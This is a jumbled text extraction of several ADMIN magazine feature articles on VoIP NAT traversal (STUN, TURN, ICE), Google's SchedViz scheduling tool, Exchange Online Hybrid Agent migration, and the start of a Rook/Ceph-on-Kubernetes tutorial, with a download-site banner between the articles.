the corresponding address. addresses, an address conflict inevita- The DNS clients transmit their DNS
Q Restricted cone: Address mapping bly occurs. If both internal computers requests to the DNS server on the
is only performed if it was trig- communicate simultaneously with public network. The packets transmit-
gered by an outgoing connection. external communication partners, ted to the public IP network thus con-
If an internal computer sends its the NAT component must decide to tain the following IP/TCP/UDP infor-
packets to an external computer, which internal computer the received mation: the same IP source address,
the NAT system uses mapping to packet will be forwarded. Because the same IP destination address, and
translate the client address. The the routing or forwarding decision is the same destination port number
external computer can then send based only on the IP addresses inte- (UDP port 53 for DNS queries). Only
its packets directly back to the grated into the IP header, this prob- the source port numbers differ in the
internal client (via address map- lem cannot be solved. DNS queries, and it is exactly this in-
ping). However, the NAT system As with dynamic address mapping, formation that is used to identify the
blocks all incoming packets from the NAT component only has to cre- internal connections.
other senders. ate a corresponding mapping table Most operating systems start the as-
Q Port-restricted cone: Similar to during the connection setup and, signment of the sender ports with the
restricted cone NAT, address map- with that, is able to assign the indi- value 1025 and then assign the source
ping only takes place if it was vidual connections to the correct IP port numbers sequentially to the indi-
triggered by an outgoing connec- addresses. The NAT process simply vidual connections. Under certain cir-
tion (identified by the IP and port searches the mapping table for the cumstances, both IP transmitters can
address). connection to which the packet be- use the same source port numbers for
Q Symmetric cone: Fundamentally
different from the NAT mecha-
nisms described so far, mapping
from the internal to the public
IP port address depends on the
target IP address of the packet
to be transmitted. For example,
if a client with the address pair
10.0.0.1:8000 is transmitting to
external computer B, address map-
ping is performed to the external
address pair 202.123.211.25:12345.
If the same client sends its packets
from the same port (10.0.0.1:8000)
to a different destination address
(computer A), it is mapped to the
address 202.123.211.25:45678. The
external hosts (A and B) can only
send their packets to the respec- Figure 2: PAT translates all internal IP addresses into just one public IP address.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 17
F E AT U R E VoIP and NAT

communication with the DNS server. Q Other local computers cannot use the information can be transmitted
In this case, a conflict is unavoidable. this port because of the fixed as- over TCP as well as UDP. The new
To avoid this statistical possibility of signment of a port number to a STUN can also be used to negotiate
a perfect address equation, the PAT specific computer. optional attributes and authentication
process not only converts the IP ad- Q Many applications select the port with VoIP servers.
dresses but also the port numbers, dynamically, making it difficult to
ensuring that the internal IP compo- determine beforehand or to select TURN as a Last Resort
nents always use an individual port a port from a port range.
number to communicate with the The STUN mechanism for transpar- STUN enables a client to determine
external IP resources. ently routing VoIP streams across the correct transport address on
NAT systems enables a VoIP endpoint which the terminal device can be
SIP Log Problems to determine the correct public IP reached from the public network. If
address, provides a mechanism for direct communication between the
SIP, according to RFC 3261 [2], is to- checking connections between two two SIP terminals is not possible and
day’s standard signaling mechanism endpoints, and provides additional STUN does not provide functional ad-
for real-time communication streams mechanisms for maintaining NAT dress mapping, the services of a relay
in an IP environment. However, SIP- address mappings using a keepalive computer are used. This mechanism
based communication also has a flaw: protocol (Figure 3). was published in RFC 5766 – “Tra-
A terminal device on the LAN cannot An earlier version of STUN described versal Using Relays Around NAT
communicate directly with a commu- in RFC 3489 [3] – now referred to as (TURN)” [5].
nication partner if one or more NAT “classic STUN” – required a complete The goal of TURN is to provide the
functions (e.g., in firewalls) exist in revision of the STUN concept on the client a publicly accessible address/
the communication channel for secu- basis of experience gained in prac- port tuple even in these situations.
rity reasons. tice. The new STUN (according to The only way to achieve this in all
When NAT converts IP addresses RFC 5389 [4]) is now just a mecha- cases is to route the data through
as described above, some protocols, nism used in conjunction with other a TURN server that can be reached
including SIP, communicate the specifications (e.g., SIP-OUTBOUND, on the public network. For this pur-
endpoint addresses when establish- TURN, and ICE). pose, a client on the TURN server
ing a connection. If the addresses The task of a standalone STUN can request an endpoint on which it
do not match, the terminals do not server is to provide the correct trans- will then be publicly accessible. The
communicate. Several NAT traversal port addresses using the STUN bind- server will then forward the packets
methods can now be used to elimi- ing function. A STUN server must be to the client.
nate this problem – but more about able to send and receive messages Because TURN behaves like port-
that later. by the UDP and TCP protocols. A restricted NAT here, the process does
plain vanilla STUN server provides not undermine the security functions
NAT Traversal and VoIP only a partial solution to the prob- of NAT and firewalls. For a client that
lem of correct transfer over NAT has defined an endpoint on a server
One tried and tested means for gateways. For this reason, a STUN via TURN, it must first send a packet
working around NAT components is server always collaborates with other to the clients from which it wants to
manual device configuration, wherein components. STUN is more like a receive packets. Operating servers
NAT is configured to forward cer- tool within a more comprehensive on well-known ports behind NAT is
tain data packets to a specific local NAT gateway solution. The following therefore not possible. The protocol
computer. NAT usually determines STUN uses are currently defined: is based on STUN and shares its mes-
forwarding on the basis of the des- Q Interactive connectivity establish- sage structure and basic mechanisms.
tination port in the data packet and ment (ICE) Although TURN always makes it
therefore requires a port number (or Q Client-oriented SIP connections possible to establish a connection,
port range) and the IP address of the to external resources (SIP-OUT- redirecting all traffic through the
local computer for port forwarding. BOUND) TURN server places a heavy load on
With the help of fixed forwarding Q NAT behavior discovery (BEHAVE- the server. Therefore, TURN should
by port number, the local computer NAT) only be considered as a last resort if
outside the network can be reached For VoIP endpoints, STUN provides a other methods like STUN do not lead
on a fixed port (range). The big ad- mechanism for correctly determining to success.
vantage of port forwarding is that it is the IP address and the port currently
the only NAT traversal technique that used at the other end of a NAT gate- ICE as a Lubricant
actually works for many applications, way or router (transition between
although it is offset by a number of the private and a public IP address In 2004, the IETF began to develop
important disadvantages: range). In contrast to classic STUN, the ICE technique. For any type of

18 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
VoIP and NAT F E AT U R E

Figure 3: A sample sequence for the STUN mechanism.

session protocol, ICE ensures trouble- dress information contained in the ICE goes through six steps to estab-
free passage through all types of NAT invitation message are known as the lish a connection:
and firewalls. ICE was designed so “candidates,” which are the potential Step 1. The call initiator collects
that the required addressing functions communication endpoints for the SIP the IP and port addresses of all po-
can be implemented with the SIP agent. When an invitation message tential communication candidates
protocol and thus also with the Ses- reaches the call recipient, the latter before the actual call. The first
sion Description Protocol (SDP). ICE also runs the ICE address collection candidates are sought by the inter-
acts as a uniform framework around functions and transmits specific ad- faces of the local computer (host).
STUN and TURN. Additionally, ICE dresses in its SIP reply. Both agents If the host has several interfaces,
supports TCP as well as UDP media then check the possible connections the agent obtains a candidate from
sessions. that are implemented by STUN mes- each interface. The candidates of
Instead of only STUN or TURN, an sages from an agent to the other end the computer interfaces (including
ICE client is able to determine the of the communication path. A check virtual interfaces) are referred to
required addresses with both meth- is performed to discover which pair as host candidates. The agent then
ods. Both addresses are transmitted of candidates works. Once a func- directly contacts the STUN server
to the communication partner along tioning pair of candidates has been on any host interface. The results
with the local interface addresses found, the media stream begins to of these tests are server-reflexive
in the subsequent SIP call setup flow between the two communica- candidates, which translate to the IP
message. The elements of the ad- tion partners. and port addresses of the outermost

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 19
F E AT U R E VoIP and NAT

NAT on the path between the agent Step 5. The caller and the called party time. The caller usually confirms the
and the STUN server and is usually have exchanged the necessary SDP candidate pair found by this process
the NAT facing the public Internet. messages. The agents involved in the to the other agent, concluding the
Finally, the agent also receives all call know all candidates for transfer- selection process.
the candidates from TURN servers. ring the media streams. Note that cer- All previous processes (candidate
These IP and port addresses reside tain applications (e.g., videophones) collection and connection tests) take
on the relay servers. generate more than one media place before the phone rings at the
Step 2. Each candidate is prioritized stream. ICE then performs the most called agent’s end; consequently,
after the agent has collected its can- important part of its tasks. Each agent the connection setup is minimally
didates. The highest priority defines pair knows the possible candidates delayed by ICE. The advantage, how-
the candidate to be used. As a rule, and the corresponding candidates of ever, is that ghost calls and miscon-
relay candidates receive the lowest its peer – the list of possible candi- nections (i.e., the phone rings, but
priority because they have the high- date pairs. Each agent calculates the the called party hears nothing) are
est voice delay. priority of the candidate pairs (com- eliminated.
Step 3. According to the identified bined priority of the individual candi- If the ICE handshake reveals that
and prioritized candidates, the agent dates), and the candidate couple with the candidate pair differs from the
generates its SIP INVITE request to the highest priority has the optimal default setting selected in the SDP
establish the call. The SDP header path between the two communication message (IP and port addresses),
is part of the INVITE request, which partners. the caller initiates an update of the
the caller uses to transmit the con- Step 6. For the final review of the default setting on the basis of a SIP
nection information required for the candidate pair, ICE conducts con- re-INVITE message to synchronize
call, including the codec, its param- nection checks on the basis of STUN all intermediate SIP elements that do
eters, and the IP and port addresses transactions from each agent. The not support ICE but need to know
to be used. ICE extends SDP by add- STUN transactions use the IP and through which addresses the media
ing some new attributes. The most port addresses of the selected candi- streams are running.
important of these is the candidate date pairs, which grow in proportion
attribute. Because the agent might to the square of the number of candi- Conclusions
know more than one possible can- dates, and control their bidirectional
didate, it transmits a separate can- accessibility. This process makes a Correct mapping of the internal IP
didate attribute in the SDP header parallel review of each candidate addresses to external IP addresses
for each possible media stream. The pair problematic. ICE checks the can- is essential to enabling unhindered
attribute contains the IP and port ad- didate pairs sequentially by priority. VoIP communication through NAT
dresses for the candidate concerned, Every 20ms each agent generates a gateways and firewalls. STUN, TURN,
its priority, and the type of candidate STUN transaction for the next pair and ICE not only ensure a transparent
(host, server reflexive, or relay). Ad- of candidates in the list. If an agent transition via NAT gateways but also
ditionally, the SDP message contains receives a STUN request for a candi- improve the security of the SIP envi-
information for safeguarding the date pair, it immediately generates a ronment as a whole. Q
STUN functions. STUN transaction in the opposite di-
Step 4. SIP transmits the SIP INVITE rection, known as a triggered check,
message with the corresponding accelerating the entire ICE process. Info
SDP information over the network. After completing the review of a [1] RFC 3022: [https://tools.ietf.org/html/
If the called agent also supports ICE, candidate pair, the agent knows that rfc3022]
the phone will ring. The party be- it has found a connection pair for [2] RFC 3261: [https://tools.ietf.org/html/
ing called collects its candidates and transmitting the media stream cor- rfc3261]
generates a preliminary SIP response, rectly. Because the checks are carried [3] RFC 3489: [https://tools.ietf.org/html/
which signals to the caller that the out according to the priorities of the rfc3489]
SIP request is still being processed. candidate pairs, the first functioning [4] RFC 5389: [https://tools.ietf.org/html/
The preliminary response contains an candidate pair represents the best rfc5389]
SDP message with the communica- possible connection between the two [5] RFC 5766: [https://tools.ietf.org/html/
tion partner’s candidates. communication partners at the given rfc5766]

20 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
F E AT U R E S SchedViz

Visualizing kernel scheduling

Behind Time
The Google SchedViz tool lets you visualize how the Linux kernel
scheduler allocates jobs among cores and whether they are being
usurped. By Samuel Bocetta

SchedViz [1] is one of a variety of priority to the various tasks that your is doing. The kernel is instrumented
open source tools recently released system needs to run? with hooks called tracepoints; when
by Google that allows you to visual- A round-robin approach would assign certain actions occur, any code
ize how your programs are being each task processing time in such a hooked to the relevant tracepoint is
handled by Linux kernel scheduling. way that each would receive equal called with arguments that describe
The tool allows you to see exactly time. In practice, however, some the action. This data is referred to as
how your system is treating the vari- tasks – such as those related to the a “trace.”
ous tasks it is running and allows core functions of your OS – are of SchedViz captures these “traces” and
you to fine-tune the way resources higher priority than others. allows you to visualize them. A com-
are allotted to each task. SchedViz makes use of a basic fea- mand-line script can capture the data
SchedViz is designed to overcome ture of the Linux kernel: the ability over a specified time and then load it
a specific problem: The basic Linux to capture data in real time about into SchedViz for as much analysis as
tools available for scheduling [2] what each core of a multicore system you care to apply. You can also keep
don’t allow you to see very much.
In practice, this means that most
people guess how to schedule system
resources, and given the complexity
of modern systems, these guesses are
often wrong.

Multiprocessing
Modern operating systems (OSs)
execute multiple processes simultane-
ously by splitting the computing load
across multiple cores and running
Lead Image © 36clicks, 123RF.com

each process for a short time before


switching to a different task (multi-
processing). This feature presents a
significant challenge for engineers: Figure 1: In this example, each horizontal bar represents a core, and the horizontal axis is
Where should each process run and measured in milliseconds. The blue process, running on one core, has been interrupted by
for how long? How should you assign the green process, which briefly swaps the core on which it runs.

22 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
SchedViz F E AT U R E S

saved traces to compare any modifi- In other situations, a process that Users can already pin threads explic-
cation you make. you would like to prioritize is made itly to a CPU or a set of CPUs or can
A basic example of a trace loaded to wait while another executes. exclude threads from specific CPUs
into SchedViz for viewing is seen in SchedViz allows you to see this with the use of features like sched_se-
Figure 1. Two processes are running happening. taffinity() [6] or cgroups [7], which
simultaneously (green and blue). Q Evaluate different scheduling poli- are both available in most Linux
The blue process, known as the cies. Linux has many ways of im- environments. However, such restric-
“victim thread,” is likely to suffer a plementing scheduling policies [3] tions can also make scheduling even
performance lag because it has been that determine which processes tougher. SchedViz allows you to see
interrupted by the green process, will run where and for how long. exactly how and when these rules are
which has swapped in to the blue If you are seeking to improve sys- being enforced, allowing you to as-
thread’s core. tem performance by manipulating sess their effectiveness.
In practice, behavior like that in Fig- these policies, SchedViz is invalu-
ure 1 is likely to result in suboptimal able, because it allows you to see a Installing SchedViz
performance. There is no obvious rea- visual representation of how they
son why the green process swapped are being applied. SchedViz is hosted on GitHub [8],
cores right at the end of its processing At the moment, the primary use that and the process for installing it will
time, but by doing so, it interrupts most system administrators will have be familiar to most advanced users.
another thread running on a different for SchedViz is to manage the way To begin, clone the repository:
core. If the blue process needs to run tasks are assigned across multicore
quickly, particularly if it is a critical processors. As Google put it in their git clone U
system process, you would like to blog, “not all cores are equal” [1], https://github.com/google/schedviz.git
stop this kind of behavior. and that’s because the structure of
SchedViz allows you to see issues like the memory hierarchy found in most Next, install the dependencies. Be-
this on a pannable, zoomable graph modern systems can make it costly cause SchedViz has quite a few of
that shows all the cores of a multicore to shift a thread from one core to these, it requires yarn, so head to
system. A more detailed trace of a another, especially if that shift moves the Yarn website [9] and follow the
three-core system is seen in Figure 2. it to a new non-uniform memory ac- instructions there. You should also
Although it might seem inefficient to cess (NUMA) node [4]. This move make sure your version of Node.js is
allocate resources in this way, with is particularly a problem when it later than 10.9.0.
each process getting a short period of comes to handling modern encryption Now you need the GNU building
time before the core swaps to another algorithms [5] that are becoming an tools and an unzip utility, so install
process, this is how typical core- integral part of working with web ser- them now if you don’t have them. On
scheduling processes work. vices and cloud storage. Debian, you can run:
The SchedViz visualization tools aims
to achieve a number of key goals:
Q Quantify task starvation caused
by round-robin queueing. In the
above example, it might be that
the blue process is running slowly
because the yellow process is as-
signed the same priority. This case
is known as “task starvation,” and
can be a significant drain on per-
formance in complex systems.
Q Identify primary antagonists steal-
ing work from critical threads.
Some processes, as seen, steal a
lot of resources from others that
may be more important. The “pri-
mary antagonists” are the biggest
drain on the performance of many
systems, and finding out which
processes are acting in this way is
extremely useful.
Q Determine when core allocation
choices yield unnecessary waiting. Figure 2: The core at the bottom is alternating between two threads (yellow and blue).

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 23
F E AT U R E S SchedViz

Table 1: bazel Options by looking at your scheduling policies


and adapting them to the needs of
Name Type Description
your system.
storage_path String Required. The folder where you want trace data to be stored.
This should be an empty folder that is not used by anything
else. Going Further: NUMA Issues
cache_size Int Optional. The maximum number of collections to keep open in Google has also highlighted Sched-
memory at once.
Viz’s ability to do more than just
port Int Optional. The port to run the server on. Defaults to 7402.
look at how processing resources are
resources_root String Optional. The folder where the static files (e.g. HTML and shared according to the CPU time
JavaScript) are stored. Default is client. If using bazel to given to each. SchedViz also provides
run the server, you shouldn’t need to change this.
a powerful way to visualize the way
larger systems work with NUMA
sudo apt-get update && U The options taken by this command nodes.
sudo apt-get install U all contain default values if you don’t Larger servers often have several
build-essential unzip want to specify them. The default NUMA nodes that are a subset of
number of seconds to record a trace DRAM memory assigned to particu-
Before running SchedViz for the first is 5, the default buffer size is 409KB, lar cores that can be accessed more
time, change to the location where the and the default number of seconds to quickly than the general memory
repo was cloned and install with Yarn: wait for a copy to finish is 5. pool. Cores can access NUMA
Once the command is run on the tar- nodes assigned to other cores,
cd schedviz get machine [10], move the tar.gz file and often do if the cores are over-
yarn install to a machine that can use the Sched- worked; however, this process is
Viz user interface. To look at the data much slower than if the cores stuck
Once it has finished, navigate to the you’ve collected, click Upload Trace to their own NUMA node. This
root of the repo folder and start up on the SchedViz collections page nonuniformity is a practical conse-
your server: (Figure 3). A list of all the traces you quence of growing core count, but
have loaded into SchedViz is pre- it brings challenges.
yarn bazel run server -- -- -storage_path= U sented that can be sorted by the date If a core jumps to a different NUMA
"<Path to folder that stores traces>" they were collected, by a description node, performance can be affected
of the traces, or by the user who col- significantly, because it will then have
This command takes several options lected them. to pay an extra tax for each DRAM
(Table 1). Opening a trace from the collec- access. SchedViz can help identify
tions menu will open a visualization cases like this, making it clear when
Using SchedViz similar to those shown in the figures a thread has had to migrate across
here, with a representation of all the NUMA boundaries. Moreover, Sched-
The most basic function of SchedViz cores on your system and what each Viz can show you which NUMA
is to collect a trace of activity from a is doing. nodes are in use at any one time,
particular machine. To do this, run What you do with this information helping to identify situations in which
the command: will depend on your requirements. one part of your machine is overtaxed
Google has provided a guide [1] while the other part sits idle. A typi-
sudo ./trace.sh U that explains how to spot common cal trace of that situation will look
-out '<Path to trace directory>' U problems in SchedViz traces, where like Figure 4. SchedViz can identify
-capture_seconds '<No. of seconds>' U a particular process might be caus- an unbalanced system like this, so
[-buffer_size '<Size of trace buffer>'] U ing your system performance to lag. the sys admin can adjust the NUMA
[-copy_timeout '<Time to wait>'] These issues can then be addressed behavior [11] to fix the issue.

Figure 3: The collections page is the main SchedViz menu. From here, you can perform all of the core functions of the program.

24 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
SchedViz F E AT U R E S

[3] Scheduling policy:


[https://www.oreilly.com/library/view/
understanding-the-linux/0596005652/
ch07s01.html]
[4] NUMA:
[https://en.wikipedia.org/wiki/
Non-uniform_memory_access]
[5] “What is AES Encryption?” by Will Ellis:
[https://privacyaustralia.net/
complete-guide-encryption/]
[6] sched_setaffinity:
[https://linux.die.net/man/2/sched_se-
taffinity]
[7] cgroups:
[https://www.kernel.org/doc/
Documentation/cgroup-v1/cgroups.txt]
[8] SchedViz on GitHub:
[https://github.com/google/schedviz]
[9] Yarn: [https://www.yarnpkg.com/en/]
[10] “30 Linux Commands Every User Should
Know” by Arturas B.:
Figure 4: All available NUMA nodes are at the right, with their usage on the left. [https://www.hostinger.com/tutorials/
Apparently, this system is very unbalanced. linux-commands]
[11] “NUMA overview” by Christoph Lameter:
Further Resources pretty useful in itself, plans are in https://queue.acm.org/detail.cfm?
progress to make it even more power- id=2513149]
If you want to explore the features ful in the future. Beyond using Sched- [12] SchedViz features and usage walkthrough:
that come packaged with SchedViz, Viz for figuring out kernel scheduler [https://github.com/google/schedviz/
take a look at the detailed features defects, Google is also looking at using blob/master/doc/walkthrough.md]
walkthrough [12] provided by Google. it to visualize other kernel tracepoints [13] ftrace:
This document will show you how to analyze other kernel behavior that [https://www.kernel.org/doc/
to collect various types of traces and could be optimized for better effi- Documentation/trace/ftrace.txt]
how to use the tools available for ciency, so watch this space. Q
analyzing them. The Author
Another very useful feature provided Info Sam Bocetta is a former defense contractor for
by the kernel is a debug feature [13] [1] Understanding scheduling behavior with the US Navy. He turned to freelance journalism
that can analyze trace data and SchedViz: [https://opensource.googleblog. in retirement, focusing on US diplomacy and
stream it to a buffer for later analysis, com/2019/10/understanding-scheduling- national security, as well as technology trends in
providing you with a quick way of behavior-with.html] cyberwarfare, cyberdefense, and cryptography.
highlighting scheduling or scheduling [2] “Command Line – at, cron, and When not writing articles, Sam can be found
rules problems. anacron” by Bruce Byfield, Linux in his “study” (actually a converted space
At the moment, SchedViz is primarily Magazine, issue 225, December 2019, above his garage) working on his first book – an
useful for tracking scheduling errors pg. 50: [http://www.linux-magazine. exploration of how to democratize personal
and fine-tuning the way you assign com/index.php/Issues/2019/225/ privacy solutions for the broader public – which
computing resources. Although that’s Command-Line-at-cron-anacron/] will be published in 2020.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 25
MAG DOWN LOAD.oRG

LATEST MAGAZINES
HIGH QUAllTY TRUE-PDF
MAG DOWN LOAD.ORG
TO O L S Exchange Hybrid Agent

Exchange Online migration with the Hybrid Agent

Mailbox
Migration
Exchange’s Hybrid Agent takes the complexity out of migrating
from a local Exchange environment to Exchange Online.
By Christian Schulenburg

When it comes to leveraging the uses Hybrid Modern Authentica- Access Server (CAS) role. Exchange
full Office 365 feature set, migrat- tion, you need to keep on using the 2010 or newer is required. It must be
ing mailboxes to Exchange Online classic Exchange Hybrid topology. installed on Windows Server 2012 R2
is one of the greatest challenges. Additionally, Hybrid Agent does not or 2016 with .NET Framework 4.6.2 or
Unlike migrating within an organiza- cover MailTips, Message Tracking, higher. If Hybrid Agent and Exchange
tion, moving to Exchange Online is and Multi-Mailbox Search. If your are set up on a server, you need to en-
problematic, because mailboxes are setup uses these functions across the sure compatibility between Exchange
shifted between two separately man- board, again, keep on using the clas- and .NET [1] to avoid the use of an
aged organizations. sic model. unsupported combination. Beyond
This connection between an on-prem- Hybrid Agent is constantly being opti- this, the server only needs to be a do-
ises Exchange instance and Exchange mized – improvements to the preview main member and have access to the
Online is known as a hybrid connec- were delivered just two months after Internet.
tion. Microsoft refers to this connec- the first launch. In its first release in The only required output connec-
tion as the Exchange Modern Hybrid February 2019, Hybrid Agent only tions are ports 443 and 80; the latter
and has extended its Hybrid Configu- supported a single installation, which is only used for certificate revocation
ration Wizard (HCW) with Hybrid was a big limitation because it of- list checks. The agent communicates
Agent (Figure 1) to facilitate the con- fered no redundancy options, free/ with Azure Application Proxy, an
nection. With HCW, Hybrid Agent busy information could not be viewed Azure proxy service with a client-
establishes a connection between the in an offline scenario, and move ac- specific endpoint that leads to your
local Exchange and Exchange Online, tions were not carried out. With the online environment. Availability
reducing the requirements for exter- April 2019 updated version, several information and mailbox migrations
nal DNS records, certificate updates, agents now can be installed in a local are managed by the Azure Applica-
and incoming firewall network con- organization, and you can now view tion Proxy. If the agent is not in-
nections – all of which made the task status information for Hybrid Agent stalled on an Exchange server with
complex in the past. and use Hybrid Agent instead of spe- CAS, you also need to enable ports
cific Exchange servers to address load 5985 and 5986 to the CAS servers
Lead Image © Natee Srisuk, 123RF.com

Multiple Choices balancers. so communications actually work.


Additionally, all CAS servers need to
Hybrid Agent does not support Hy- Hybrid Agent Preparation be able to connect to Office 365 over
brid Modern Authentication, which port 443 to retrieve available/busy
includes, for example, multifactor You can install Hybrid Agent either on information.
authentication and authentication a standalone server (agent server) or Microsoft provides a script [2] for
with client certificates. If your setup on an Exchange server with the Client checking the connection settings be-

26 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Exchange Hybrid Agent TO O L S

fore installation. Start by integrating lessly, I am selecting the minimal which you can download after con-
the script as follows: configuration here. If you do not see firming.
the Hybrid configuration window, you Once this is done, set up the send
Import Modules .\HybridManagement.psm1 have already successfully set up a hy- and receive connectors. Email traffic
brid topology. is secured by TLS; you need to select
The following call runs the actual Next, you need to check the domain a valid certificate for this in the next
test: ownership. Verification is similar to step. The external hostname must be
domain verification in Office 365: En- entered in the certificate; it must be
Test-HybridConnectivity -testO365Endpoints ter the displayed DNS-TXT record in possible to resolve this name exter-
your DNS zone and confirm owner- nally, and it must be accessible over
For everything to run smoothly, you ship. Now select the topology. Hybrid port 25. Hybrid Agent is not respon-
need to make sure that at least one Agent is offered to you as part of the sible for routing email, only for mak-
identical email domain is set up as Exchange Modern Hybrid topology, ing the appropriate configurations. You
the accepted domain in each Ex-
change organization.

Installing the Agent


Hybrid Agent is part of the Office
365 HCW. The installer automatically
downloads the latest version of Hybrid
Agent in the background. The easiest
way to start HCW is in the Exchange
Admin Center (EAC) from the Hybrid
menu item. HCW (Figure 2) is a click-
to-run application that you download
directly from Microsoft – the latest ver-
sion is always launched. To run it, you
need to be an Exchange Online global
administrator. You can see the HCW Figure 1: The Exchange Modern Hybrid topology with the new Hybrid Agent removes a
version number in the top right corner, number of challenges in the connection between a local installation and Exchange Online.
and further information is added dur-
ing the next few steps.
After launching, select a local Ex-
change server that is configured for
the hybrid connection. To continue,
the server needs to be licensed. You
can also license an Exchange Hybrid
server at this point. When using the
Hybrid license, no mailboxes can
reside on the server. You also need to
select the target platform, which is
where you enter the location of your
online environment – this could be
a cloud environment or the standard
Microsoft environment.
First, you will be prompted to choose
your hybrid configuration. Hybrid
Agent is available in two variants:
minimal and full. The full Hybrid
configuration is primarily intended
for long-term coexistence and takes
the mail flow, eDiscovery, and shar-
ing of available/busy information into
account. Because the minimal config-
uration is mainly designed to transfer
mailboxes to Exchange Online seam- Figure 2: The HCW guides you through the configuration and starts the Hybrid Agent.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 27
TO O L S Exchange Hybrid Agent

Exchange Online. Although this is not


the same as synchronization, it is an
easy way to transfer settings quickly.
OCT requires the latest cumulative
update locally and supports Exchange
Server 2010 or newer. OCT is part of
the HCW; you select the transfer dur-
ing hybrid configuration.

The Last Exchange Server


Standing
Once all the mailboxes have been
migrated to Exchange Online, you can
uninstall the last Exchange server, but
only if you will not be synchronizing
the users with Azure Active Directory
(AD) Connect, which integrates your
local directories into Azure AD, giv-
ing users a single identity. Because it
Figure 3: After successfully connecting the environments, mailboxes in Exchange Online is not a prerequisite for the use of a
can be set up using the local environment. hybrid configuration, I won’t discuss
it in detail here.
can see the result after completion of cal environment to Exchange Online. If you use this function, you need
the configuration in the EAC under To do this, go to the Exchange Online an Exchange server to maintain the
mail flow | connectors. EAC and select recipients | migration local Exchange attributes. If no lo-
After you have entered the specifica- and then Migrate to Exchange Online. cal Exchange server is available, the
tions, the corresponding configuration Third, test the client experience by Exchange extensions for the AD ob-
is performed in the Exchange orga- checking the available/busy informa- jects, which are essential for smooth
nizations. If all goes well, this com- tion for mailboxes from different envi- hybrid operation with Office 365, are
pletes the hybrid connection between ronments in a new event. missing. As a result of this require-
your on-premises Exchange instance ment, you need to continue to import
and Exchange Online. During the in- Between Two Worlds Exchange updates, including potential
stallation, shortcuts are also created schema extensions.
on the server; you can use them to Admins need to be aware that the two
restart the HCW in case of changes in Exchange organizations are indepen- Conclusions
your Exchange organization. dent of each other in terms of configu-
ration. In the EAC, you can quickly Microsoft has removed the complex-
Test Connection switch between the two worlds with ity from migrating between local Ex-
the Enterprise and Office 365 tabs. Ba- change environments and Exchange
Once the hybrid connection has been sically, policies such as the Retention Online. Even small and medium-sized
set up, you need to test a number of Policy, OWA Policy, or Mobile Device enterprises, which Microsoft identi-
features. First, check email transport Policy need to be created and config- fies as potential users of Office 365,
by sending messages back and forth ured separately. The Organization Con- can benefit from an easier migration,
between local and online mailboxes. figuration Transfer (OCT) wizard helps thanks to Hybrid Agent. Q
You will also want to test accessibility you migrate the settings. The first OCT
from an external source. version was released in June 2018 and Info
Next, try creating mailboxes. You can only supported the guidelines at that [1] .NET and Exchange support ma-
now create mailboxes for Exchange time. The next version (released in Oc- trix: [https://docs.microsoft.com/
Online in the local EAC (Figure 3), tober 2018) added features, such as Ac- en-us/exchange/plan-and-deploy/
although you may experience a short tive Sync Device Access Rule, Address supportability-matrix?
delay before the account becomes List, and Policy Tip Config. view=exchserver-2019]
available in Office 365. First, you The first version only supported the [2] Microsoft Hybrid Agent Public Pre-
need to assign a license to the ac- initial transfer; in other words, if the view: [https://techcommunity.
count so that the user can log in to wizard saw a setting with an identical microsoft.com/t5/exchange-team-blog/
the mailbox. Second, migrate some name, it was just ignored. The second the-microsoft-hybrid-agent-public-preview/
mailboxes in Office 365 from your lo- version now overwrites settings in ba-p/608939]

28 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
TO O L S Rook

Optimally combine Kubernetes and Ceph with Rook

Castling
Ceph distributed storage and Kubernetes container orchestration come together with Rook. By Martin Loschwitz

Hardly a year goes by that does not The most important advantage is in almost every scenario. Many Open-
see some kind of disruptive technol- undoubtedly that Ceph integrated Stack vendors are migrating their dis-
ogy unfold and existing traditions into the Kubernetes workflow with tributions to Kubernetes, and because
swept away. That’s what the two the help of Rook [1] can be controlled OpenStack almost always comes with
technologies discussed in this article and monitored just like any other Ceph in tow, Kubernetes will also
have in common. Ceph captured the Kubernetes resource. Kubernetes is include Ceph. However, I’ll show you
storage solutions market in a flash. aware of Ceph and its topology and how to get started if you don’t have a
Meanwhile, Kubernetes shook up the can adapt it if necessary. However, a ready-made OpenStack distribution –
market for virtualization solutions, setup in which Ceph sits under Ku- and don’t want one – with a manual
not only grabbing market share off bernetes and only passes persistent integration.
KVM and others, but also off industry volumes through to it, knowing noth-
giants such as VMware. ing about Ceph, is not integrated and The Beginnings: Kubernetes
When two disruptive technologies lacks homogeneity.
such as containers and Ceph are mix- Any admin wanting to work with
ing up the same market, collisions Getting Started with Rook Rook in a practical way first needs a
can hardly be avoided. The tool that working Kubernetes, for which Rook
Lead Image © satori, 123RF.com

brings Ceph and Kubernetes together ADMIN introduced Rook in detail needs only a few basic necessities.
is Rook, which lets you roll out a some time ago [2], looking into its In this article, I do not assume that
Ceph installation to a cluster with advantages and disadvantages. Since you already have a running Kuber-
Kubernetes and offers advantages then, much has happened. For ex- netes available, which gives those
over a setup where Ceph sits “under” ample, if you work with OpenStack, who have had little or no practical ex-
Kubernetes. Rook will be available automatically perience with Kubernetes the chance

30 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Rook TO O L S

to get acquainted with the subject. recently, this was almost automati- Listing 1: Installing CRI-O
Setting up Kubernetes is not compli- cally Docker, but not all of the Linux
cated. Several tools promise to handle community is Docker friendly. An # modprobe overlay
this task quickly and well. alternative to Docker is CRI-O [3], # modprobe br_netfilter

which now officially supports Ku-


[ ... required Sysctl parameters ... ]
Rolling Out Kubernetes bernetes. To use it on Ubuntu 18.04,
# cat > /etc/sysctl.d/99-kubernetes-cri.conf <<EOF
you need to run the commands in
net.bridge.bridge-nf-call-iptables = 1
Kubernetes, which is not nearly as Listing 1. As a first step, you set net.ipv4.ip_forward = 1
complex as other cloud approaches several sysctl variables; the actual net.bridge.bridge-nf-call-ip6tables = 1
like OpenStack, can be deployed in an installation of the CRI-O packages EOF
all-in-one environment by the kubeadm then follows.
tool. The following example is based The systemctl start crio command # sysctl --system
